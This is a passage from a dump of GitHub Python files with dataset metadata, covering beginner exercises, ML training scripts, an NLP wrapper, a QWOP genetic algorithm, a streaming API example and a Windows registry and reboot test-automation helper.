rollercoaster!\")\n\nheight = int(input(\"What is your height in cm? \"))\nage = int(input(\"What is your age? \"))\nbill = 0\n\nif height >= 120:\n if age < 12:\n bill = 5\n elif age <= 18:\n bill = 7\n else:\n bill = 12\n \n wants_photo = input(\"Do you want a photo taken? 
yes or no: \")\n if wants_photo == \"yes\":\n bill += 3\n \n print(f\"Your bill is {bill}\")\nelse:\n print(\"You can't ride the rollercoaster!\")\n","repo_name":"itsmeshibintmz/100-Days-of-Code-Mastering-Python","sub_path":"day-4/multiple-if-statements/rollercoaster-exercise-2.py","file_name":"rollercoaster-exercise-2.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34836345483","text":"from validations.decorators import get_atributes\n\n\nclass Products:\n _products_db = {}\n def __init__(self, **kwargs):\n if len(kwargs) > 0:\n self.__id = self.get_id\n self.__name = kwargs.get('name')\n self.__cantidity = kwargs.get('cantidity')\n self.__unit_price = kwargs.get('unit_price')\n self.__set_atributes\n \n @property\n def get_id(self):\n keys = list(self._products_db.keys())\n keys = 0 if len(keys) == 0 else keys[-1]\n return keys + 1\n \n @get_atributes\n def get_atributes(self, data: dict):\n return data\n \n @property\n def __set_atributes(self):\n data = self.get_atributes(self).copy()\n id = data.get('id')\n data.pop('id')\n self._products_db[id] = data\n print(f\"El id para {data.get('name')} es {id}\")\n \n @property\n def get_db_products(self):\n print(f\"\\n{'id': ^4}|{'nombre': ^30}|{'cantidad': ^10}|{'precio unitario': ^15}\")\n if not(len(self._products_db) > 0):\n print('No existe ningun producto aún\\n')\n return None\n for keys, values in self._products_db.items():\n dato = lambda key: values.get(key)\n print(f\"{keys: <4}|{dato('name')[:30]: <30}|{str(dato('cantidity'))[:15]: <10}|{str(dato('unit_price'))[:15]: <15}\")\n else:\n print(\"\\n\")\n \n def change_atributes(self, id, *args):\n for i in args:\n if self._products_db.get(id) == None:\n print('Ese producto no existe')\n return None\n elif self._products_db.get(id).get(i) == None:\n print(f'Usted no tiene el dato \"{i}\"')\n continue\n new_value = input(f\"Digite el nuevo dato para {i}: \")\n try:\n if i == 'cantidity' and int(new_value) < 0:\n print('La cantidad no se permite menor a cero')\n return None\n if i == 'cantidity':\n new_value = int(new_value)\n if i == 'unit_price' and int(new_value) < 0:\n print('La precio no se permite menor a cero')\n return None\n if i == 'unit_price':\n new_value = float(new_value)\n except Exception as e:\n print('Error de formato')\n return None\n self._products_db[id][i] = new_value\n print('Cambio exitoso')\n \n def drop_products_db(self, id):\n if self._products_db.get(id) == None:\n print(f'Ese id no existe')\n return None\n self._products_db.pop(id)\n print('Se elimino exitosamente')\n \n def request_id(self, id):\n return id in list(self._products_db.keys())\n \n def list_all_data(self):\n return self._products_db","repo_name":"ArturoDeveloment/Management_products","sub_path":"controllers/Productos.py","file_name":"Productos.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25491212914","text":"import torch\nfrom accelerate import Accelerator\nfrom tqdm.autonotebook import tqdm\nfrom transformers import get_linear_schedule_with_warmup, get_constant_schedule_with_warmup\n\n\ndef collate_fn(tknz):\n def func(batch):\n x,y = [i[0] for i in batch], [i[1] for i in batch]\n \n encoding = tknz(x,padding=\"longest\",max_length=256,truncation=True,return_tensors=\"pt\")\n input_ids, attention_mask = encoding.input_ids, encoding.attention_mask\n target_encoding = 
target_encoding = tknz(y,padding=\"longest\",max_length=256,truncation=True,return_tensors=\"pt\")\n labels = target_encoding.input_ids\n labels[labels == tknz.pad_token_id] = -100\n return dict(input_ids=input_ids, attention_mask=attention_mask, labels=labels, text=(x,y))\n return func\n\n\ndef train(model, tokenizer, train_loader, test_loader=None, epoch=1, fp16=True, lr=1e-5, warmup=0.1, pbar=True, update_every=1):\n\n accelerator = Accelerator(gradient_accumulation_steps=update_every, mixed_precision='fp16' if fp16 else 'no')\n\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr)\n model, optimizer, train_loader, test_loader = accelerator.prepare(model, optimizer, train_loader, test_loader)\n schedule = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=int(warmup*epoch*len(train_loader)//update_every),\n num_training_steps=epoch*len(train_loader)//update_every)\n\n\n for ep in range(epoch):\n model.train()\n for batch_idx, input_info in enumerate(tqdm(train_loader) if pbar else train_loader):\n with accelerator.accumulate(model):\n loss = model(input_ids=input_info['input_ids'], attention_mask=input_info['attention_mask'], labels=input_info['labels']).loss\n accelerator.backward(loss)\n optimizer.step()\n optimizer.zero_grad()\n if warmup is not None and not accelerator.optimizer_step_was_skipped and batch_idx % update_every == 0:\n schedule.step()\n if batch_idx % 100 == 0:\n print(f'Epoch: {ep+1}/{epoch}, Batch: {batch_idx}/{len(train_loader)}, Loss: {loss.item()*update_every:.4f}')\n \n if test_loader is not None:\n model.eval()\n total_loss = 0\n total = 0\n with torch.no_grad():\n for batch_idx, input_info in enumerate(tqdm(test_loader) if pbar else test_loader):\n loss = model(input_ids=input_info['input_ids'], attention_mask=input_info['attention_mask'], labels=input_info['labels']).loss\n total_loss += loss.item()*input_info['input_ids'].shape[0]\n total += input_info['input_ids'].shape[0]\n print(f'Epoch: {ep+1}/{epoch}, Test Loss: {total_loss/total:.4f}')\n for input_info in test_loader:\n outputs = model.generate(input_info['input_ids'], attention_mask=input_info['attention_mask'], max_length=256, num_beams=4, early_stopping=True)\n for input_id, pred, target in zip(input_info['input_ids'], outputs, input_info['text'][1]):\n print(f'Input: {tokenizer.decode(input_id, skip_special_tokens=True)}\\nPred: {tokenizer.decode(pred, skip_special_tokens=True)}\\nTarget: {target}\\n')\n break\n break\n","repo_name":"chenyn66/fol_pretrain","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30354818994","text":"import matplotlib.pyplot as plt\r\nfrom ltp import LTP\r\nimport numpy as np\r\nimport pandas as pd\r\nimport json\r\n\r\nclass centext_ltp():\r\n def __init__(self,sents):\r\n '''\r\n NLP wrapper class used to run the various LTP language-processing steps.\r\n :param sents: the sentences to process\r\n '''\r\n self.ltp = LTP(path='pretrained_model') # loads the Small model by default\r\n self.sents = sents\r\n def __len__(self):\r\n # total character length of the sentences\r\n return len(\"\".join(self.sents))\r\n def sent_split(self):\r\n # sentence splitting\r\n return self.ltp.sent_split(self.sents)\r\n def seg(self):\r\n # word segmentation\r\n seg, hidden = self.ltp.seg([sent for sent in self.sent_split()])\r\n return seg, hidden\r\n def pos(self):\r\n # part-of-speech tagging\r\n seg, hidden = self.seg()\r\n return self.ltp.pos(hidden)\r\n def ner(self):\r\n # named entity recognition\r\n seg, hidden = self.seg()\r\n return self.ltp.ner(hidden)\r\n\r\n
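# (Added usage sketch, mirroring the __main__ block at the bottom of this file:)\r\n#   ctx = centext_ltp([\"小明去深圳宝安区参加了一场腾讯会议\"])\r\n#   ctx.seg()[0] gives per-sentence token lists; ctx.ner() the LTP entities.\r\n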
def fanyi_language_count(df):\r\n # bar chart of how many texts each translation engine translated per target language\r\n plt.style.use('ggplot')\r\n plt.rcParams[\"font.sans-serif\"] = ['SimHei']\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n language_lists = ['汉语', '英语', '日语', '韩语']\r\n x_data = language_lists\r\n x_width = [i for i in range(len(x_data))]\r\n for fanyi_key in fanyi_lists:\r\n y_data = []\r\n for language_key in language_lists:\r\n # filter the dataframe by target language\r\n df2 = df[df['目标语言'] == language_key]\r\n # filter by translation engine and count the rows\r\n y_data.append(df2[df2['用户选择的翻译引擎'] == fanyi_key]['翻译结果'].count())\r\n plt.bar(x_width, y_data, width=0.2, align='center', label=fanyi_key)\r\n x_width = [(i + 0.2) for i in x_width]\r\n plt.xticks([0.3, 1.3, 2.3, 3.3], x_data)\r\n plt.legend()\r\n return plt\r\n\r\ndef pos_radar():\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n with open('nlp_analys/nlp_pos.json','r',encoding='utf-8') as f:\r\n results = json.load(f)\r\n return radar('翻译引擎不同类型词性分析能力', fanyi_lists, results)\r\n\r\ndef ner_radar():\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n with open('nlp_analys/nlp_ner.json', 'r', encoding='utf-8') as f:\r\n results = json.load(f)\r\n return radar('翻译引擎不同类型实体分析能力', fanyi_lists, results)\r\n\r\n\r\ndef radar(title,fanyi_lists,results):\r\n '''\r\n Build a radar chart.\r\n :param title: chart title\r\n :param fanyi_lists: translation engines\r\n :param results: per-engine results\r\n :return: the radar chart (pyplot module)\r\n '''\r\n plt.style.use('ggplot')\r\n plt.rcParams[\"font.sans-serif\"] = ['SimHei']\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n\r\n # pos_tags = {'a': '形容词', 'n': '名词', 'v': '动词', 'm': '量词', 'd': '副词', 'r': '代词'}\r\n # ner_tags = {'Nh': '人名', 'Ni': '机构名', 'Ns': '地名'}\r\n # results = [{\"形容词\": 87, \"名词\": 79, \"动词\": 95, \"量词\": 92,'代词':150,'副词':120}]\r\n\r\n max_length = max([r for result in results for r in result.values()])\r\n data_length = len(results[0])\r\n # divide the polar axis evenly according to the number of data points\r\n angles = np.linspace(0, 2 * np.pi, data_length, endpoint=False)\r\n labels = [key for key in results[0].keys()]\r\n score = [[v for v in result.values()] for result in results]\r\n # close the radar polygon by repeating the first point\r\n angles = np.concatenate((angles, [angles[0]]))\r\n labels = np.concatenate((labels, [labels[0]]))\r\n # set the figure size\r\n fig = plt.figure(figsize=(8, 6), dpi=100)\r\n # create a polar subplot\r\n ax = plt.subplot(111, polar=True)\r\n # draw one polygon per engine\r\n for s in score:\r\n score_a = np.concatenate((s, [s[0]]))\r\n ax.plot(angles, score_a)\r\n # label each spoke\r\n ax.set_thetagrids(angles * 180 / np.pi, labels)\r\n # put 0 degrees at the top (north)\r\n ax.set_theta_zero_location('N')\r\n # set the radial limits\r\n ax.set_rlim(0, max_length)\r\n # angle at which the radial tick labels are drawn, relative to the start\r\n ax.set_rlabel_position(270)\r\n ax.set_title(title)\r\n plt.legend(fanyi_lists, loc='best')\r\n return plt\r\n\r\n\r\nif __name__ == '__main__':\r\n contexts = centext_ltp([\"小明去深圳宝安区参加了一场腾讯会议\",\"阿里巴巴公司正在进行裁员\"])\r\n print(contexts.sent_split())\r\n print(contexts.seg()[0])\r\n print(contexts.pos())\r\n print(contexts.ner())\r\n print(len(contexts))\r\n pos_radar()\r\n ner_radar()\r\n","repo_name":"cshmzin/fanyi","sub_path":"data_analys.py","file_name":"data_analys.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"720221575","text":"import mxnet as mx\nimport os\nimport logging\nimport argparse\nfrom math import ceil\nimport sparse_sgd\n\n
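# (Added note:) get_symbol() below wires a 784 -> 128 -> 64 -> 10 MLP with ReLU\n# activations; 784 matches the flattened 28x28 MNIST images produced by the\n# iterators further down (data_shape=(784,), flat=True).\n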
# symbol net\ndef get_symbol():\n data = mx.symbol.Variable('data')\n fc1 = mx.symbol.FullyConnected(data, name='fc1', num_hidden=128)\n act1 = mx.symbol.Activation(fc1, name='relu1', act_type=\"relu\")\n fc2 = mx.symbol.FullyConnected(act1, name='fc2', num_hidden=64)\n act2 = mx.symbol.Activation(fc2, name='relu2', act_type=\"relu\")\n fc3 = mx.symbol.FullyConnected(act2, name='fc3', num_hidden=10)\n softmax = mx.symbol.SoftmaxOutput(fc3, name='sm')\n\n return softmax\n\n# download ubyte version of mnist and untar\ndef download_data():\n if not os.path.isdir(\"data/\"):\n os.system(\"mkdir data/\")\n if (not os.path.exists('data/train-images-idx3-ubyte')) or \\\n (not os.path.exists('data/train-labels-idx1-ubyte')) or \\\n (not os.path.exists('data/t10k-images-idx3-ubyte')) or \\\n (not os.path.exists('data/t10k-labels-idx1-ubyte')):\n os.system(\"wget -q http://data.mxnet.io/mxnet/data/mnist.zip -P data/\")\n os.chdir(\"./data\")\n os.system(\"unzip -u mnist.zip\")\n os.chdir(\"..\")\n\n# get data iterators\ndef get_iters(batch_size):\n train = mx.io.MNISTIter(\n image=\"data/train-images-idx3-ubyte\",\n label=\"data/train-labels-idx1-ubyte\",\n data_shape=(784,),\n label_name='sm_label',\n batch_size=batch_size,\n shuffle=True,\n flat=True,\n silent=False,\n seed=10)\n val = mx.io.MNISTIter(\n image=\"data/t10k-images-idx3-ubyte\",\n label=\"data/t10k-labels-idx1-ubyte\",\n data_shape=(784,),\n label_name='sm_label',\n batch_size=batch_size,\n shuffle=True,\n flat=True,\n silent=False)\n\n return (train, val)\n\ndef test_mlp(args):\n # get parameters\n prefix = './mlp'\n batch_size = 100\n pruning_switch_epoch = [int(i) for i in args.pruning_switch_epoch.split(',')]\n num_epoch = pruning_switch_epoch[-1]\n batches_per_epoch = ceil(60000.0/batch_size)\n weight_sparsity = args.weight_sparsity\n bias_sparsity = args.bias_sparsity\n weight_threshold = args.weight_threshold\n bias_threshold = args.bias_threshold\n if args.weight_sparsity:\n weight_sparsity = [float(i) for i in args.weight_sparsity.split(',')]\n bias_sparsity = [float(i) for i in args.bias_sparsity.split(',')]\n else:\n weight_threshold = [float(i) for i in args.weight_threshold.split(',')]\n bias_threshold = [float(i) for i in args.bias_threshold.split(',')]\n\n # get symbols and iterators\n sym = get_symbol()\n download_data()\n (train, val) = get_iters(batch_size)\n\n # fit model\n model = mx.mod.Module(\n sym,\n context=[mx.cpu(i) for i in range(2)],\n data_names=['data'],\n label_names=['sm_label'])\n optimizer_params = {\n 'learning_rate' : 0.1,\n 'wd' : 0.004,\n 'momentum' : 0.9,\n 'pruning_switch_epoch' : pruning_switch_epoch,\n 'batches_per_epoch' : batches_per_epoch,\n 'weight_sparsity' : weight_sparsity,\n 'bias_sparsity' : bias_sparsity,\n 'weight_threshold' : weight_threshold,\n 'bias_threshold' : bias_threshold}\n logging.info('Start training...')\n model.fit(train,\n eval_data=val,\n eval_metric='acc',\n epoch_end_callback=mx.callback.do_checkpoint(prefix),\n num_epoch=num_epoch,\n optimizer='sparsesgd',\n optimizer_params=optimizer_params)\n logging.info('Finish training...')\n\n # remove files\n for i in range(num_epoch):\n os.remove('%s-%04d.params' % (prefix, i + 1))\n os.remove('%s-symbol.json' % prefix)\n\n\nif __name__ == \"__main__\":\n\n # print logging by default\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser(description=\"sparse training\")\n parser.add_argument('--pruning_switch_epoch', type=str)\n parser.add_argument('--weight_sparsity', type=str, default=None)\n parser.add_argument('--bias_sparsity', type=str, default=None)\n parser.add_argument('--weight_threshold', type=str, default=None)\n parser.add_argument('--bias_threshold', type=str, default=None)\n args = 
parser.parse_args()\n\n test_mlp(args)\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/dsd/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"1749453078","text":"import argparse\nfrom pathlib import Path\nimport pickle\n\nimport mlflow\nimport numpy as np\n\nfrom hyperopt import STATUS_OK, Trials, fmin, hp, tpe\nfrom hyperopt.pyll import scope\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n \ndef load_pickle(filename: str):\n with open(filename, \"rb\") as f_in:\n return pickle.load(f_in)\n\n\ndef run(data_path, tracking_uri, num_trials):\n\n dv = load_pickle(data_path / 'dv.pkl')\n X_train, y_train = load_pickle(data_path / 'train.pkl')\n X_valid, y_valid = load_pickle(data_path / 'valid.pkl')\n\n if tracking_uri:\n mlflow.set_tracking_uri(tracking_uri)\n else:\n mlflow.set_tracking_uri(\"sqlite:///mlflow.db\")\n\n mlflow.set_experiment(\"nyc-taxi-experiment\")\n \n # mlflow.sklearn.autolog()\n def objective(params):\n with mlflow.start_run():\n mlflow.set_tags(\n {'estimator_name':'RandomForestRegressor',\n 'estimator_class':'sklearn.ensemble._forest.RandomForestRegressor'}\n )\n mlflow.log_params(params)\n\n rf = RandomForestRegressor(**params)\n rf.fit(X_train, y_train)\n\n mlflow.sklearn.log_model(rf, artifact_path='model')\n y_pred = rf.predict(X_valid)\n rmse = mean_squared_error(y_valid, y_pred, squared=False)\n mlflow.log_metric('rmse', rmse)\n\n with open(data_path / 'dict_vectorizer.bin', 'wb') as f_out:\n pickle.dump(dv, f_out)\n \n # accepts str path only\n mlflow.log_artifact(str(data_path / 'dict_vectorizer.bin'))\n\n return {'loss': rmse, 'status': STATUS_OK}\n\n search_space = {\n 'max_depth': scope.int(hp.quniform('max_depth', 1, 20, 1)),\n 'n_estimators': scope.int(hp.quniform('n_estimators', 10, 50, 1)),\n 'min_samples_split': scope.int(hp.quniform('min_samples_split', 2, 10, 1)),\n 'min_samples_leaf': scope.int(hp.quniform('min_samples_leaf', 1, 4, 1)),\n 'random_state': 42\n }\n\n rstate = np.random.default_rng(42) # for reproducible results\n\n fmin(\n fn=objective,\n space=search_space,\n algo=tpe.suggest,\n max_evals=num_trials,\n trials=Trials(),\n rstate=rstate\n )\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_path\",\n default=\"../data/output\",\n type=Path,\n help=\"the location where the processed NYC taxi trip data was saved.\"\n )\n parser.add_argument(\n \"--tracking_uri\", \"-t\",\n default=None,\n help=\"Host:port if remote; leave none for local mlflow.db file\"\n )\n parser.add_argument(\n \"--max_evals\",\n default=50,\n type=int,\n help=\"the number of parameter evaluations for the optimizer to explore.\"\n )\n args = parser.parse_args()\n\n run(\n args.data_path, \n args.tracking_uri, \n args.max_evals\n )\n","repo_name":"vykuang/mlops-zoomcamp","sub_path":"w4-deployment/web-service-mlflow/train_hpo.py","file_name":"train_hpo.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6800694731","text":"m = int(input())\r\nd = int(input())\r\ns = (m*2+d)%3 \r\nif s ==0 :\r\n print('普通')\r\nelif s ==1:\r\n print('吉')\r\nelse :\r\n print('大吉')\r\n \r\n#exec(n = [ eval(i) for i in 
input().split()]),print([\"普通\",\"吉\",\"大吉\"][(n[0]*2+n[1])%3])\r\n\r\n","repo_name":"Bill640616Chen/python","sub_path":"w3-Excersize003-1.py","file_name":"w3-Excersize003-1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19864284303","text":"import random\n\ndef createNewPopulation(oldPopulation):\n #breed the fittest parents until we have a full population again and run\n newPopulation = []\n fittestIndexes = getFittest(oldPopulation)\n\n #log data about parents to be bred to file\n parents = []\n for x in range(len(fittestIndexes)):\n parents.append(oldPopulation[fittestIndexes[x]])\n\n with open(\"population.txt\", \"a\") as myFile:\n myFile.write(str(parents)+\"\\n\")\n\n for x in range(0, 4):\n for y in range(x+1, 4):\n parent1 = fittestIndexes[x]\n parent2 = fittestIndexes[y]\n children = breedParents(parent1, parent2, oldPopulation)\n for child in children:\n newPopulation.append(child)\n\n for i in range(len(newPopulation)):\n newPopulation[i] = mutateChild(newPopulation[i])\n\n with open(\"population.txt\", \"a\") as myFile:\n myFile.write(str(newPopulation)+\"\\n\")\n\n return list(newPopulation)\n\ndef getMin(myList):\n mini = myList[0][0]\n miniIndex = 0\n for x in range(1, len(myList)):\n if myList[x][0] < mini:\n mini = myList[x][0]\n miniIndex = x\n\n return mini, miniIndex\n\ndef getFittest(population):\n fittest = []\n #fill a list of 4 fittest until end of population\n for x in range(len(population)):\n fitness = getFitnessOfSpecies(population[x])\n if len(fittest) < 4:\n fittest.append([fitness, x])\n else:\n score, index = getMin(fittest)\n if score < fitness:\n #remove the min and put new fitness in\n del fittest[index]\n fittest.append([fitness, x])\n\n #return index of 4 fittest parents\n returnList = []\n for x in range(len(fittest)):\n returnList.append(fittest[x][1])\n\n return returnList\n\ndef breedParents(parent1Index, parent2Index, population):\n #breed 6 children\n children = []\n\n #pick a random sub-section 1/5th the size of both parents and switch them to create a child\n shortestParent = min(len(population[parent1Index][0]), len(population[parent2Index][0]))\n substringLength = shortestParent//5\n\n for _ in range(3):\n startSplit = random.randrange(0, shortestParent-substringLength)\n newChildString1 = population[parent2Index][0][:startSplit] + population[parent1Index][0][startSplit:startSplit+substringLength] + population[parent2Index][0][startSplit+substringLength:] \n newChildString2 = population[parent1Index][0][:startSplit] + population[parent2Index][0][startSplit:startSplit+substringLength] + population[parent1Index][0][startSplit+substringLength:]\n children.append(newChildString1) \n children.append(newChildString2)\n\n return children\n\ndef mutateChild(child):\n #pick random inputs and change them\n temp = list(child)\n\n for _ in range(random.randrange(0, len(child)//6)):\n place = random.randrange(len(child))\n temp[place] = str(random.randrange(0, 16))\n\n return \"\".join(temp)\n\ndef getFitnessOfSpecies(species):\n fitness = float(species[1])/float(species[2])\n return fitness","repo_name":"etopiei/QWOP-Bot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"9135571686","text":"from pili import 
*\n\naccess_key=\"\"\nsecret_key=\"\"\n\nhub_name=\"jinxinxin\"\nrtmp_publish_host=\"pili-publish.live.golanghome.com\"\nhls_live_play_host=\"pili-live-hls.live.golanghome.com\"\n\n# publish address\n# rtmp://pili-publish.live.golanghome.com/jinxinxin/test?key=abc\n\ncredentials=Credentials(access_key,secret_key)\nhub=Hub(credentials,hub_name)\n\nstream=hub.create_stream(publishSecurity=\"dynamic\")\nprint(stream.id)\nprint(stream.to_json())\n\nrtmp_url=stream.rtmp_publish_url()\nprint(rtmp_url)\n\n\nhls_urls=stream.hls_live_urls()\nprint(hls_urls)\n\n","repo_name":"lubaoyilang/qiniu-live-server","sub_path":"example/create_stream.py","file_name":"create_stream.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6617729066","text":"import json\r\nimport pickle\r\nfrom keypoints.facial_landmarks import initialisation\r\nfrom keypoints.detectvisage import detectvisage\r\nimport sys\r\n\r\ncheminPhoto = sys.argv[1]\r\nprint(cheminPhoto)\r\n# Run the initialisation function for the image analysis\r\ndetector, predictor = initialisation()\r\n\r\n# Save the detector\r\ndetectorFile = open(\"./stockage/detector.txt\", \"wb\")\r\ndetectorFile.write(pickle.dumps(detector))\r\ndetectorFile.close()\r\n\r\n# Save the predictor\r\npredictorFile = open(\"./stockage/predictor.txt\", \"wb\")\r\npredictorFile.write(pickle.dumps(predictor))\r\npredictorFile.close()\r\n\r\n# Retrieve the coordinates of the correct posture\r\nx11,y11,x19,y19,x17,y17,D = detectvisage(cheminPhoto, detector, predictor)\r\n\r\n# Save the coordinates of the correct posture\r\nfichier = open(\"./stockage/coordonnees.json\", \"w\")\r\nfichier.write(json.dumps([x11,y11,x19,y19,x17,y17,D]))\r\nfichier.close()\r\n","repo_name":"EstebanEstoc/Capgemini-Assistant-for-Working-Position","sub_path":"initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1289947441","text":"from _winreg import *\r\nfrom ntsecuritycon import *\r\nfrom sys import stdout\r\nfrom test_file import *\r\nimport win32security\r\nimport win32api\r\nimport psutil\r\nimport subprocess\r\nimport time\r\nimport json\r\n\r\n\r\nkeyObject = None\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\n# Opens registry key with specified subkey #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\ndef RegistryKey(rkey, skey):\r\n spath = skey\r\n kres = True\r\n global keyObject\r\n if rkey == 'HKEY_USERS':\r\n try:\r\n keyObject = OpenKey(HKEY_USERS, spath)\r\n except WindowsError:\r\n kres = False\r\n else:\r\n try:\r\n keyObject = OpenKey(HKEY_LOCAL_MACHINE, spath)\r\n except WindowsError:\r\n kres = False\r\n return kres\r\n\r\n\r\n\r\n# Checks value info for subkey\r\n# Returns dict of missing values\r\n\r\ndef RegistryValue(json_report):\r\n test_name = \"Registry Check\"\r\n result = True\r\n path = r'C:\\Wacomation\\resources\\RegList.json'\r\n with open(path, 'r') as f:\r\n val_dict = json.load(f)\r\n 
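# (Added note, inferred from the comparison loop below:) RegList.json is\r\n # expected to map arbitrary keys to {'Name', 'Type', 'Data'} records that\r\n # are checked one by one against the values of the opened registry key.\r\n 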
_winreg.EnumValue method. These should not change, so maybe convert to tuple\r\n\r\n    error_map = {}\r\n    kcount = 1\r\n    vkeylist = list(val_dict.keys())\r\n    vkeylist.sort()\r\n    errcout = 0\r\n    for val in vkeylist:\r\n        valCompareResult = False\r\n        vname = val_dict[val]['Name']\r\n        vtype = val_dict[val]['Type']\r\n        vdata = val_dict[val]['Data']\r\n        _name = vname.strip()\r\n        _type = vtype\r\n        _data = vdata\r\n        sk, v, lm = QueryInfoKey(keyObject)\r\n        i = 0\r\n        # scan every value under the open key until a match is found or the values run out\r\n        while i < v and not valCompareResult:\r\n            q_name, q_data, q_type = EnumValue(keyObject, i)\r\n            _compare = cmp(str(q_data), str(_data.strip('\"')))\r\n            q_type = typeList[q_type]\r\n            if _name == '(Default)':\r\n                _name = ''\r\n            if (_name, _compare, _type) == (q_name, 0, q_type):\r\n                valCompareResult = True\r\n            i += 1\r\n        # record the expected value as missing when nothing under the key matched\r\n        if not valCompareResult:\r\n            errcout += 1\r\n            result = False\r\n            cout = str(errcout)\r\n            error_map[cout] = {'Name': vname, 'Type': vtype, 'Data': vdata}\r\n    results_map = AddTest(json_report, test_name, result, error_map)\r\n    return results_map\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\n# Method that assigns the next script to run on startup #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\ndef RegEntry(d, s):\r\n    RegPath = r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\r\n    RunOnce = OpenKey(HKEY_CURRENT_USER, RegPath, 0, KEY_WRITE)\r\n    SetValueEx(RunOnce, \"Test Automation\", 0, REG_SZ, r\"C:\\%s\\scripts\\%s\" % (d, s))\r\n    CloseKey(RunOnce)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that adjusts privileges so the script can perform a reboot  #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef AdjustPrivilege(priv, enable=1):\r\n    # Get process token\r\n    flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY\r\n    htoken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), flags)\r\n    # Get the ID for the system shutdown privilege\r\n    id = win32security.LookupPrivilegeValue(None, priv)  # params = (systemName, privilegeName)\r\n    # Obtain the privilege for this process\r\n    # Create a list of privileges to be added\r\n    if enable:\r\n        newPrivileges = [(id, SE_PRIVILEGE_ENABLED)]\r\n    else:\r\n        newPrivileges = [(id, 0)]\r\n    # make the privilege adjustment\r\n    win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that adjusts privileges and performs reboot when called  #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef RebootSystem(message=\"Rebooting\", timeout=0, bForce=1, bReboot=1):\r\n    AdjustPrivilege(SE_SHUTDOWN_NAME)\r\n    try:\r\n        win32api.InitiateSystemShutdown(None, message, timeout, bForce, bReboot)\r\n    finally:\r\n        # Remove privilege just added\r\n        AdjustPrivilege(SE_SHUTDOWN_NAME, 0)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that iterates through process list to find process \"pname,\"  #\r\n# then returns true, PID, and status when found                         #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef FindProcess(pname):\r\n    n = False\r\n    pid = 0\r\n    pstat = 'not found'\r\n    for process in psutil.process_iter():\r\n        process = psutil.Process(process.pid)\r\n        proc_name = process.name()\r\n        if proc_name == pname:\r\n            pid = process.pid\r\n            pstat = process.status()\r\n            n = True\r\n    return n, pid, pstat\r\n\r\n\r\ndef ProcessTest(json_report):\r\n    error = {}\r\n    
